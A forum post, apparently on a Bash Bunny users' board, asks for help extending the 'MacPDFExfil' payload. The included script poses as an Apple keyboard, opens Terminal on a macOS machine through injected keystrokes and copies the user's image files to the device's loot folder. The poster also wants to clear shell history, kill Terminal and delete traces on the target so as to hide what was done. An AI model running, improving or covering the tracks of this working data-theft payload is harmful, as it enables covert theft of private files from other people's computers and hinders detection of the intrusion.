me2019 Posted September 14, 2019

Hello,

I posted this same question under the Applications&Coding section but thought it would probably fit better here, and it doesn't seem like I can delete the old post. So anyway... here is my question:

I was playing around with the MacPDFExfil payload on my Bash Bunny and as expected it worked fine. I however tried to modify it a bit and ran into some trouble. I wanted the BashBunny to look for .jpg, .jpeg and .png files all at the same time and put them into the loot folder. Changing it to only one of them is no problem, but I couldn't figure out a way to look for all 3 file types at the same time.

Moreover, I wanted the code to have a history -c and then the killall Terminal to leave as little trace of what I did as possible. Obviously that didn't work either. Replacing the killall Terminal with history -c works fine, but having history -c and then killall Terminal didn't work. I played around with it and either I got an error or the last part (killall Terminal) just didn't show up at all.

Last but not least, I would also like to remove the /loot folder that is created on the target machine itself.

If someone could help me with that I'd appreciate it a lot.

Thanks

```bash
#!/bin/bash
#
# Title: MacPDFExfil
# Author: k1ul3ss
# Props: audibleblink
# Version: 1.0
# Category: Exfiltration
# Target: macOS
# Attackmodes: HID, Storage

ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

# device name
dev_name="BashBunny"
# loot directory
lootdir="/Volumes/$dev_name/loot/Images/"

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir -p $lootdir
QUACK ENTER
QUACK STRING find \~ -name \'*.png\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
QUACK ENTER

# sync the filesystem
sync
```